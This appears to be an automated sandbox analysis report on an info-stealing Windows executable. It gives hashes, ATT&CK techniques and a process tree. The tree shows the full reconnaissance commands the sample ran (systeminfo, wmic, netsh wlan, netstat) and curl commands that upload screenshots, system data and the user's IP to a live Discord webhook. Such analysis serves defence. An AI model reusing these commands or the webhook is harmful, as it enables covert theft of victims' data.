444113051cce66297688bf565a9c1548b846578c39c974552bf682ab4c6179da

Analysis

max time kernel
151s
max time network
158s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
11/10/2023, 07:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

444113051cce66297688bf565a9c1548b846578c39c974552bf682ab4c6179da.exe
Size

186KB
MD5

6eafc14c149327e90099492a38f19563
SHA1

2749d75cf4adbeb2d6a69234d25bbc4816549085
SHA256

444113051cce66297688bf565a9c1548b846578c39c974552bf682ab4c6179da
SHA512

24b84a02a56840acfa323f88575022f4c458ac6409de24d50762ebbf16c8684a54675f389e6f3b4a50237d84f590c1f5461b5d298d1f6f5b27137f704482d168
SSDEEP

3072:EAFHdppuOf+wMSHjnywM0vY9t8Qkh+nS8Y9:tFPMOf+wMAywM0EJksnSl9

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://discord.com/api/webhooks/1145879417403494511/XvdwF1kDtpo6uVnirQlo7LEYYnolBJqCZ9jMnYemcfKqVdVQz3R6WTssixblc5eR1xY4

Extracted

Language

ps1

Source

URLs

exe.dropper

https://discord.com/api/webhooks/1145879417403494511/XvdwF1kDtpo6uVnirQlo7LEYYnolBJqCZ9jMnYemcfKqVdVQz3R6WTssixblc5eR1xY4

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
105	4412	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation	444113051cce66297688bf565a9c1548b846578c39c974552bf682ab4c6179da.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
33	myexternalip.com
31	myexternalip.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
664	timeout.exe

Gathers network information 2 TTPs 2 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
4420	ipconfig.exe
1644	NETSTAT.EXE

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4164	systeminfo.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2372	powershell.exe
2372	powershell.exe
4020	powershell.exe
4020	powershell.exe
4412	powershell.exe
4412	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2372	powershell.exe
Token: SeIncreaseQuotaPrivilege	2016	WMIC.exe
Token: SeSecurityPrivilege	2016	WMIC.exe
Token: SeTakeOwnershipPrivilege	2016	WMIC.exe
Token: SeLoadDriverPrivilege	2016	WMIC.exe
Token: SeSystemProfilePrivilege	2016	WMIC.exe
Token: SeSystemtimePrivilege	2016	WMIC.exe
Token: SeProfSingleProcessPrivilege	2016	WMIC.exe
Token: SeIncBasePriorityPrivilege	2016	WMIC.exe
Token: SeCreatePagefilePrivilege	2016	WMIC.exe
Token: SeBackupPrivilege	2016	WMIC.exe
Token: SeRestorePrivilege	2016	WMIC.exe
Token: SeShutdownPrivilege	2016	WMIC.exe
Token: SeDebugPrivilege	2016	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2016	WMIC.exe
Token: SeRemoteShutdownPrivilege	2016	WMIC.exe
Token: SeUndockPrivilege	2016	WMIC.exe
Token: SeManageVolumePrivilege	2016	WMIC.exe
Token: 33	2016	WMIC.exe
Token: 34	2016	WMIC.exe
Token: 35	2016	WMIC.exe
Token: 36	2016	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2016	WMIC.exe
Token: SeSecurityPrivilege	2016	WMIC.exe
Token: SeTakeOwnershipPrivilege	2016	WMIC.exe
Token: SeLoadDriverPrivilege	2016	WMIC.exe
Token: SeSystemProfilePrivilege	2016	WMIC.exe
Token: SeSystemtimePrivilege	2016	WMIC.exe
Token: SeProfSingleProcessPrivilege	2016	WMIC.exe
Token: SeIncBasePriorityPrivilege	2016	WMIC.exe
Token: SeCreatePagefilePrivilege	2016	WMIC.exe
Token: SeBackupPrivilege	2016	WMIC.exe
Token: SeRestorePrivilege	2016	WMIC.exe
Token: SeShutdownPrivilege	2016	WMIC.exe
Token: SeDebugPrivilege	2016	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2016	WMIC.exe
Token: SeRemoteShutdownPrivilege	2016	WMIC.exe
Token: SeUndockPrivilege	2016	WMIC.exe
Token: SeManageVolumePrivilege	2016	WMIC.exe
Token: 33	2016	WMIC.exe
Token: 34	2016	WMIC.exe
Token: 35	2016	WMIC.exe
Token: 36	2016	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2492	WMIC.exe
Token: SeSecurityPrivilege	2492	WMIC.exe
Token: SeTakeOwnershipPrivilege	2492	WMIC.exe
Token: SeLoadDriverPrivilege	2492	WMIC.exe
Token: SeSystemProfilePrivilege	2492	WMIC.exe
Token: SeSystemtimePrivilege	2492	WMIC.exe
Token: SeProfSingleProcessPrivilege	2492	WMIC.exe
Token: SeIncBasePriorityPrivilege	2492	WMIC.exe
Token: SeCreatePagefilePrivilege	2492	WMIC.exe
Token: SeBackupPrivilege	2492	WMIC.exe
Token: SeRestorePrivilege	2492	WMIC.exe
Token: SeShutdownPrivilege	2492	WMIC.exe
Token: SeDebugPrivilege	2492	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2492	WMIC.exe
Token: SeRemoteShutdownPrivilege	2492	WMIC.exe
Token: SeUndockPrivilege	2492	WMIC.exe
Token: SeManageVolumePrivilege	2492	WMIC.exe
Token: 33	2492	WMIC.exe
Token: 34	2492	WMIC.exe
Token: 35	2492	WMIC.exe
Token: 36	2492	WMIC.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
4020	powershell.exe
4020	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4836 wrote to memory of 4368	4836	444113051cce66297688bf565a9c1548b846578c39c974552bf682ab4c6179da.exe	88
PID 4836 wrote to memory of 4368	4836	444113051cce66297688bf565a9c1548b846578c39c974552bf682ab4c6179da.exe	88
PID 4836 wrote to memory of 4368	4836	444113051cce66297688bf565a9c1548b846578c39c974552bf682ab4c6179da.exe	88
PID 4368 wrote to memory of 3776	4368	cmd.exe	92
PID 4368 wrote to memory of 3776	4368	cmd.exe	92
PID 4368 wrote to memory of 3776	4368	cmd.exe	92
PID 3776 wrote to memory of 3884	3776	net.exe	93
PID 3776 wrote to memory of 3884	3776	net.exe	93
PID 3776 wrote to memory of 3884	3776	net.exe	93
PID 4368 wrote to memory of 4420	4368	cmd.exe	94
PID 4368 wrote to memory of 4420	4368	cmd.exe	94
PID 4368 wrote to memory of 4420	4368	cmd.exe	94
PID 4368 wrote to memory of 2372	4368	cmd.exe	98
PID 4368 wrote to memory of 2372	4368	cmd.exe	98
PID 4368 wrote to memory of 2372	4368	cmd.exe	98
PID 4368 wrote to memory of 2016	4368	cmd.exe	106
PID 4368 wrote to memory of 2016	4368	cmd.exe	106
PID 4368 wrote to memory of 2016	4368	cmd.exe	106
PID 4368 wrote to memory of 2492	4368	cmd.exe	107
PID 4368 wrote to memory of 2492	4368	cmd.exe	107
PID 4368 wrote to memory of 2492	4368	cmd.exe	107
PID 4368 wrote to memory of 4232	4368	cmd.exe	108
PID 4368 wrote to memory of 4232	4368	cmd.exe	108
PID 4368 wrote to memory of 4232	4368	cmd.exe	108
PID 4368 wrote to memory of 4164	4368	cmd.exe	109
PID 4368 wrote to memory of 4164	4368	cmd.exe	109
PID 4368 wrote to memory of 4164	4368	cmd.exe	109
PID 4368 wrote to memory of 2128	4368	cmd.exe	112
PID 4368 wrote to memory of 2128	4368	cmd.exe	112
PID 4368 wrote to memory of 2128	4368	cmd.exe	112
PID 4368 wrote to memory of 2964	4368	cmd.exe	113
PID 4368 wrote to memory of 2964	4368	cmd.exe	113
PID 4368 wrote to memory of 2964	4368	cmd.exe	113
PID 2964 wrote to memory of 3248	2964	cmd.exe	114
PID 2964 wrote to memory of 3248	2964	cmd.exe	114
PID 2964 wrote to memory of 3248	2964	cmd.exe	114
PID 4368 wrote to memory of 4420	4368	cmd.exe	115
PID 4368 wrote to memory of 4420	4368	cmd.exe	115
PID 4368 wrote to memory of 4420	4368	cmd.exe	115
PID 4368 wrote to memory of 1644	4368	cmd.exe	116
PID 4368 wrote to memory of 1644	4368	cmd.exe	116
PID 4368 wrote to memory of 1644	4368	cmd.exe	116
PID 4368 wrote to memory of 664	4368	cmd.exe	117
PID 4368 wrote to memory of 664	4368	cmd.exe	117
PID 4368 wrote to memory of 664	4368	cmd.exe	117
PID 4368 wrote to memory of 4020	4368	cmd.exe	118
PID 4368 wrote to memory of 4020	4368	cmd.exe	118
PID 4368 wrote to memory of 4020	4368	cmd.exe	118
PID 4020 wrote to memory of 1760	4020	powershell.exe	119
PID 4020 wrote to memory of 1760	4020	powershell.exe	119
PID 4020 wrote to memory of 1760	4020	powershell.exe	119
PID 4368 wrote to memory of 4916	4368	cmd.exe	120
PID 4368 wrote to memory of 4916	4368	cmd.exe	120
PID 4368 wrote to memory of 4916	4368	cmd.exe	120
PID 4368 wrote to memory of 724	4368	cmd.exe	121
PID 4368 wrote to memory of 724	4368	cmd.exe	121
PID 4368 wrote to memory of 724	4368	cmd.exe	121
PID 4368 wrote to memory of 5052	4368	cmd.exe	122
PID 4368 wrote to memory of 5052	4368	cmd.exe	122
PID 4368 wrote to memory of 5052	4368	cmd.exe	122
PID 4368 wrote to memory of 3460	4368	cmd.exe	123
PID 4368 wrote to memory of 3460	4368	cmd.exe	123
PID 4368 wrote to memory of 3460	4368	cmd.exe	123
PID 4368 wrote to memory of 4484	4368	cmd.exe	124

C:\Users\Admin\AppData\Local\Temp\444113051cce66297688bf565a9c1548b846578c39c974552bf682ab4c6179da.exe
"C:\Users\Admin\AppData\Local\Temp\444113051cce66297688bf565a9c1548b846578c39c974552bf682ab4c6179da.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4836
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zS7203.tmp\BackUp.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4368
- - C:\Windows\SysWOW64\net.exe
    net session
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3776
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 session
      4⤵
      PID:3884
- - C:\Windows\SysWOW64\curl.exe
    curl -o C:\Users\Admin\AppData\Local\Temp\ipp.txt https://myexternalip.com/raw
    3⤵
    PID:4420
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table >C:\Users\Admin\AppData\Local\Temp\programms.txt "
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2372
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic diskdrive get size
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2016
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic bios get serialnumber
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2492
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic cpu get name
    3⤵
    PID:4232
- - C:\Windows\SysWOW64\systeminfo.exe
    systeminfo
    3⤵
    - Gathers system information
    PID:4164
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic csproduct get uuid
    3⤵
    PID:2128
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh wlan show profile
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2964
  - - C:\Windows\SysWOW64\netsh.exe
      netsh wlan show profile
      4⤵
      PID:3248
- - C:\Windows\SysWOW64\ipconfig.exe
    ipconfig /all
    3⤵
    - Gathers network information
    PID:4420
- - C:\Windows\SysWOW64\NETSTAT.EXE
    netstat -an
    3⤵
    - Gathers network information
    PID:1644
- - C:\Windows\SysWOW64\timeout.exe
    timeout 1
    3⤵
    - Delays execution with timeout.exe
    PID:664
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell.exe -executionpolicy remotesigned -File C:\Users\Admin\AppData\Local\Temp\test.ps1
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:4020
  - - C:\Windows\SysWOW64\curl.exe
      "C:\Windows\system32\curl.exe" -i -F file=@C:\Users\Admin\AppData\Local\Temp\Admin_Capture.jpg https://discord.com/api/webhooks/1145879417403494511/XvdwF1kDtpo6uVnirQlo7LEYYnolBJqCZ9jMnYemcfKqVdVQz3R6WTssixblc5eR1xY4
      4⤵
      PID:1760
- - C:\Windows\SysWOW64\curl.exe
    curl -X POST -H "Content-type: application/json" --data "{\"content\": \"```User = Admin Ip = 154.61.71.13 time = 7:30:02.68 date = Fri 09/15/2023 os = Windows_NT Computername = SMIJWJMH ```\"}" https://discord.com/api/webhooks/1145879417403494511/XvdwF1kDtpo6uVnirQlo7LEYYnolBJqCZ9jMnYemcfKqVdVQz3R6WTssixblc5eR1xY4
    3⤵
    PID:4916
- - C:\Windows\SysWOW64\curl.exe
    curl -i -H 'Expect: application/json' -F file=@C:\Users\Admin\AppData\Local\Temp\System_INFO.txt https://discord.com/api/webhooks/1145879417403494511/XvdwF1kDtpo6uVnirQlo7LEYYnolBJqCZ9jMnYemcfKqVdVQz3R6WTssixblc5eR1xY4
    3⤵
    PID:724
- - C:\Windows\SysWOW64\curl.exe
    curl -i -H 'Expect: application/json' -F file=@C:\Users\Admin\AppData\Local\Temp\sysi.txt https://discord.com/api/webhooks/1145879417403494511/XvdwF1kDtpo6uVnirQlo7LEYYnolBJqCZ9jMnYemcfKqVdVQz3R6WTssixblc5eR1xY4
    3⤵
    PID:5052
- - C:\Windows\SysWOW64\curl.exe
    curl -i -H 'Expect: application/json' -F file=@C:\Users\Admin\AppData\Local\Temp\ip.txt https://discord.com/api/webhooks/1145879417403494511/XvdwF1kDtpo6uVnirQlo7LEYYnolBJqCZ9jMnYemcfKqVdVQz3R6WTssixblc5eR1xY4
    3⤵
    PID:3460
- - C:\Windows\SysWOW64\curl.exe
    curl -i -H 'Expect: application/json' -F file=@C:\Users\Admin\AppData\Local\Temp\netstat.txt https://discord.com/api/webhooks/1145879417403494511/XvdwF1kDtpo6uVnirQlo7LEYYnolBJqCZ9jMnYemcfKqVdVQz3R6WTssixblc5eR1xY4
    3⤵
    PID:4484
- - C:\Windows\SysWOW64\curl.exe
    curl -i -H 'Expect: application/json' -F file=@C:\Users\Admin\AppData\Local\Temp\programms.txt https://discord.com/api/webhooks/1145879417403494511/XvdwF1kDtpo6uVnirQlo7LEYYnolBJqCZ9jMnYemcfKqVdVQz3R6WTssixblc5eR1xY4
    3⤵
    PID:4380
- - C:\Windows\SysWOW64\curl.exe
    curl -i -H 'Expect: application/json' -F file=@C:\Users\Admin\AppData\Local\Temp\uuid.txt https://discord.com/api/webhooks/1145879417403494511/XvdwF1kDtpo6uVnirQlo7LEYYnolBJqCZ9jMnYemcfKqVdVQz3R6WTssixblc5eR1xY4
    3⤵
    PID:3140
- - C:\Windows\SysWOW64\curl.exe
    curl -i -H 'Expect: application/json' -F file=@C:\Users\Admin\AppData\Local\Temp\wlan.txt https://discord.com/api/webhooks/1145879417403494511/XvdwF1kDtpo6uVnirQlo7LEYYnolBJqCZ9jMnYemcfKqVdVQz3R6WTssixblc5eR1xY4
    3⤵
    PID:3416
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell.exe -executionpolicy remotesigned -File C:\Users\Admin\AppData\Local\Temp\testtttt.ps1
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    PID:4412

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
748aa582c7486db8047f76262ea50c8b

SHA1
eb5ddcb89a344c46ea46173c15c1cc4b6431ddce

SHA256
844f434b134165e6d34490bd57d7834fe17a9a93672bb603e96c96618b4bf7f7

SHA512
236273994710878be4cf79c08bee3747391ffee633e404ffa889784d2d1e72338d0cb9477e1becc9510129d38c31cd307d47bd358b339ffc0254c8543cf13c34

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
e43d47c7c486eaeb4a13b2de42138217

SHA1
f0e9b343ff288ef592e9d1540fff3ed0e7848fc8

SHA256
0b417d0e670c217c41f9f0f4ff1aaaf8e73f345337e1a8983d0b6dfa0d404149

SHA512
8dcd533765419a4f3237f98a1bd3d3108958570b1a33e48d14668ed47249f70ef90acb5f0f962afccf04e0fb22bf40f8a3b094f412c770f6d3384ce5eacfcdc6

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS7203.tmp\BackUp.bat

Filesize
18KB

MD5
5b0b01a5c8905aaff5038a38c476e2e6

SHA1
8736d82ba9e574b9d0d021af0a0c70afed88b5f4

SHA256
592efd09ab36e711e42aea5ecf0d79ee6ae19cfa57c67a5bcac4966e27304f66

SHA512
769f1f6ebd76769f492a16888433ffacbdfb8092d43219345d11b7bb33eb8804a816c1bff85c18153f253e3c37a84e6826cfbf8596250ea0437e33ee1f389252

Download Submit
C:\Users\Admin\AppData\Local\Temp\Admin_Capture.jpg

Filesize
56KB

MD5
434185afd6f47bf8e18a474b1522b125

SHA1
b79097851e3a6eea5278ded7259576d726d4977f

SHA256
c5e87ad028b60f344467eb735386a1fbaee68db38d617a91fb7639d850d89321

SHA512
cf03f28a5ce92c70a42434f20d5ae8a555eae55cca31c6a67abe8c50aa6fc3d03c9f510fc99592ffd1d5cde6cb1ccd7ce9985927ce2fde138ee8c249f2934b55

Download Submit
C:\Users\Admin\AppData\Local\Temp\System_INFO.txt

Filesize
311B

MD5
533c630c2f09949235ff3d463041deff

SHA1
be73ac6c09729d9063001f2c05c61b8b816ff303

SHA256
734eb105772c9c6878017c9ab34fa0f4bb73e0142aab068b71161d28776c835c

SHA512
e0581b8b11175f5bc1aeada6be7772f7c889bf64ad40b7c87ad4feea536a96b875dd8d97f7ed5e791671f0453e70954eacdebb58cf667d5c9fdb33eff1221ca8

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3ox2j53n.hsl.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ip.txt

Filesize
1023B

MD5
a93d9636b6a32eef12399604e5064c08

SHA1
99820e310b8ba5dcdc1a6c5ce0192df44ce1dece

SHA256
74036fe3ccc86f6fc5d07854227565910b5752494d8ee86b9f9e85f1336ab6c1

SHA512
1c0c5f3542c3353397ad465c38098af6760e46bf1609e99953a3fd8686dc8daa00817d72ae088925c88100f1e8e5ad5d3af9dd9e4cd99457ed4b34851d0a252e

Download Submit
C:\Users\Admin\AppData\Local\Temp\ipp.txt

Filesize
12B

MD5
71d587e911373f62d72a158eceb6e0e7

SHA1
68d81a1a4fb19c609288a94f10d1bbb92d972a68

SHA256
acce61361a3dee677653fa2909f29530202335835c71031ba4dff50682ae5de8

SHA512
a0010c487c8b1eeae82ae82896bf5f48b7ec5573197bbe149b6803093a32b3b470ef0b122278e404cd5df296376bb0629438609997d52c14757ff1c3e6756060

Download Submit
C:\Users\Admin\AppData\Local\Temp\programms.txt

Filesize
8KB

MD5
83ea16e268bd4e73063594b39a07814b

SHA1
e45861b85e4039a8cedd66b9b3679af0e2279179

SHA256
f5741825db400b19a42466326ccb6dcb44b5a0a4d7d1de5658ae09761b25edb3

SHA512
7bff8675da386ba813a9955efb4f412f8f4fddfce7e87e21a953f2a8d4bb556d42c347c10bb34fbf05d9c907e4c3d63181ea72f3d736c7d99e29362ea25834a0

Download Submit
C:\Users\Admin\AppData\Local\Temp\sysi.txt

Filesize
2KB

MD5
f76d997245999f582ea6db94f387c9c2

SHA1
d5ce331211c6491a3c2361e888d08d6951a45bc3

SHA256
a15491480fe7b49e22fd5db592968f03b53f4980fc480c75349669982cadb6c1

SHA512
3b91763f5a7fed0230d35668eb9b2260c2fdc48b1f7df90a0ec945b81ee8181787dfc14afc1b8c703981e0707d16d037a6393b200e6deebd8c73c330a93c0334

Download Submit
C:\Users\Admin\AppData\Local\Temp\test.ps1

Filesize
1KB

MD5
98885f143a81832fafc5178f35f281e9

SHA1
f19b14a9ae66bb753fe7da9ace44e730256fc1f0

SHA256
7889d454a12240f888967317e25ee924d411f6c42dba60aedfdfb28e8f116f19

SHA512
025c5cc20f78e440799ca4a80e9f3c98f5bed4dddbc1dcf60d6dc321538d44a8864988deadf8cf3dd054b94c9e7a17e3d9bb32195e0861694f16e16c9354400e

Download Submit
C:\Users\Admin\AppData\Local\Temp\testtttt.ps1

Filesize
2KB

MD5
68c06b1d0f019676745e95c7f024466b

SHA1
e1656851b1540b68e046de8cd2cf421fd3a5213a

SHA256
e14ddd639eae7e4a5e81524cf6f29f1d619cbdaf3e6db956d6ccf07054df36ec

SHA512
71de38b8ba1671d10a4baa232c055e9467c7a06493f359e0baa26b6da66a0b02dde6b257ca27575b66ce529bceab1b99683a7a5a4caa67da7a2e1f7006224826

Download Submit
C:\Users\Admin\AppData\Local\Temp\uuid.txt

Filesize
162B

MD5
9d9362fca70310015cd0561d9a9deafc

SHA1
31d83515b7d090a6602e541976086938e5769cc6

SHA256
f78de8ee7109fd3970aa6c014eb01717c55a78c57c7bf1f7a5b898afb13bb13b

SHA512
161790306e40b5b7e957b764b679869ab2d8e104cf8c38321fe4eed98f201a5ca7c168ab59beeddd167257e99958a27011ab6b04cba3f67276544186b3103355

Download Submit
memory/2372-24-0x0000000005E40000-0x0000000005E5E000-memory.dmp

Filesize
120KB

Download
memory/2372-26-0x0000000073100000-0x00000000738B0000-memory.dmp

Filesize
7.7MB

Download
memory/2372-28-0x0000000007010000-0x00000000070A6000-memory.dmp

Filesize
600KB

Download
memory/2372-29-0x0000000006330000-0x000000000634A000-memory.dmp

Filesize
104KB

Download
memory/2372-30-0x0000000006380000-0x00000000063A2000-memory.dmp

Filesize
136KB

Download
memory/2372-31-0x0000000007660000-0x0000000007C04000-memory.dmp

Filesize
5.6MB

Download
memory/2372-32-0x0000000008290000-0x000000000890A000-memory.dmp

Filesize
6.5MB

Download
memory/2372-35-0x0000000073100000-0x00000000738B0000-memory.dmp

Filesize
7.7MB

Download
memory/2372-12-0x0000000005770000-0x00000000057D6000-memory.dmp

Filesize
408KB

Download
memory/2372-27-0x0000000004A00000-0x0000000004A10000-memory.dmp

Filesize
64KB

Download
memory/2372-7-0x0000000073100000-0x00000000738B0000-memory.dmp

Filesize
7.7MB

Download
memory/2372-25-0x0000000005E80000-0x0000000005ECC000-memory.dmp

Filesize
304KB

Download
memory/2372-23-0x0000000005950000-0x0000000005CA4000-memory.dmp

Filesize
3.3MB

Download
memory/2372-8-0x0000000004A00000-0x0000000004A10000-memory.dmp

Filesize
64KB

Download
memory/2372-13-0x00000000057E0000-0x0000000005846000-memory.dmp

Filesize
408KB

Download
memory/2372-9-0x0000000004870000-0x00000000048A6000-memory.dmp

Filesize
216KB

Download
memory/2372-10-0x0000000005040000-0x0000000005668000-memory.dmp

Filesize
6.2MB

Download
memory/2372-11-0x0000000004E80000-0x0000000004EA2000-memory.dmp

Filesize
136KB

Download
memory/4020-71-0x0000000073220000-0x00000000739D0000-memory.dmp

Filesize
7.7MB

Download
memory/4020-73-0x0000000005280000-0x0000000005290000-memory.dmp

Filesize
64KB

Download
memory/4020-93-0x0000000005280000-0x0000000005290000-memory.dmp

Filesize
64KB

Download
memory/4020-91-0x0000000073220000-0x00000000739D0000-memory.dmp

Filesize
7.7MB

Download
memory/4020-95-0x0000000005280000-0x0000000005290000-memory.dmp

Filesize
64KB

Download
memory/4020-97-0x0000000073220000-0x00000000739D0000-memory.dmp

Filesize
7.7MB

Download
memory/4020-89-0x0000000006650000-0x000000000665A000-memory.dmp

Filesize
40KB

Download
memory/4020-88-0x0000000007BD0000-0x0000000007C62000-memory.dmp

Filesize
584KB

Download
memory/4020-87-0x0000000005280000-0x0000000005290000-memory.dmp

Filesize
64KB

Download
memory/4020-85-0x0000000006900000-0x000000000694C000-memory.dmp

Filesize
304KB

Download
memory/4020-83-0x00000000062C0000-0x0000000006614000-memory.dmp

Filesize
3.3MB

Download
memory/4020-92-0x0000000005280000-0x0000000005290000-memory.dmp

Filesize
64KB

Download
memory/4020-72-0x0000000005280000-0x0000000005290000-memory.dmp

Filesize
64KB

Download
memory/4412-162-0x0000000073220000-0x00000000739D0000-memory.dmp

Filesize
7.7MB

Download
memory/4412-165-0x0000000005520000-0x0000000005874000-memory.dmp

Filesize
3.3MB

Download
memory/4412-164-0x0000000002300000-0x0000000002310000-memory.dmp

Filesize
64KB

Download
memory/4412-176-0x0000000006170000-0x00000000061BC000-memory.dmp

Filesize
304KB

Download
memory/4412-163-0x0000000002300000-0x0000000002310000-memory.dmp

Filesize
64KB

Download
memory/4412-178-0x0000000002300000-0x0000000002310000-memory.dmp

Filesize
64KB

Download
memory/4412-179-0x00000000071A0000-0x0000000007362000-memory.dmp

Filesize
1.8MB

Download
memory/4412-180-0x00000000086A0000-0x0000000008BCC000-memory.dmp

Filesize
5.2MB

Download
memory/4412-181-0x0000000073220000-0x00000000739D0000-memory.dmp

Filesize
7.7MB

Download
memory/4412-183-0x0000000073220000-0x00000000739D0000-memory.dmp

Filesize
7.7MB

Download